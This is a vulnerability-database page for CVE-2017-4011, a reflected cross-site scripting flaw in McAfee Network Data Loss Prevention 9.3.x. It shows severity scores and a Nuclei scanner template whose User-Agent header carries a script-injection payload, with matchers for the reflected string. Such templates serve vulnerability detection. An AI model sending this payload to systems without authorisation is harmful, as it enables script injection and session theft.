Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-4011
HistoryAug 16, 2021 - 8:45 p.m.

McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting

2021-08-1620:45:09
ProjectDiscovery
github.com
3

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.2%

McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.

id: CVE-2017-4011

info:
  name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.
  reference:
    - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10198
    - https://nvd.nist.gov/vuln/detail/CVE-2017-4011
    - http://www.securitytracker.com/id/1038523
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-4011
    cwe-id: CWE-79
    epss-score: 0.00142
    epss-percentile: 0.49977
    cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mcafee
    product: network_data_loss_prevention
  tags: cve,cve2017,mcafee,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4b0a0048304602210092d78e5c2ee601a72fc1005ecee2f4d612d4e1e2ad952794c3c9b11b002f77cb0221008c9d309becc69658e90dcaaa56997b4ddc7bbd5f7964589f4253b715708a4b2c:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.2%

Related for NUCLEI:CVE-2017-4011